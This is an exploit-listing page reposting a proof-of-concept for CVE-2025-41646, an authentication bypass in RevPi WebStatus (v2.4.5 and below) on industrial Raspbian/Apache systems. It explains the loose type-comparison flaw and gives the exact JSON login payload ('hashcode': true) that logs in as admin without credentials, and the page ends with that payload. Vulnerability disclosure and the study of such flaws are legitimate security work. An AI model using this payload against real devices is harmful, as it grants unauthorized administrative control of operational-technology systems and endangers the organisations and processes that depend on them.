Exploit for Incorrect Type Conversion or Cast in Kunbus Revpi_Status CVE-2025-41646

Name: Exploit for Incorrect Type Conversion or Cast in Kunbus Revpi_Status CVE-2025-41646
Rating: 5 (8 reviews)

2025-07-04 | CVSS 9.8

## https://sploitus.com/exploit?id=B74185C6-074A-55F5-B8D7-87DD56918272
# CVE-2025-41646---Critical-Authentication-Bypass-
CVE-2025-41646 - Critical Authentication bypass

# 🔓 CVE-2025-41646 - RevPi WebStatus Authentication Bypass PoC

A critical authentication bypass vulnerability (CVE-2025-41646) in RevPi WebStatus ≤ v2.4.5 allows an attacker to log in as **admin** without valid credentials due to weak type comparison logic (`==` vs `===`).

---

## 📌 Affected

- RevPi WebStatus v2.4.5 and below
- Industrial/OT systems running on Raspbian with Apache

---

## 💥 Exploitation

Send a login request with:

```json
{
  "mode": "LOGIN",
  "username": "admin",
  "hashcode": true
}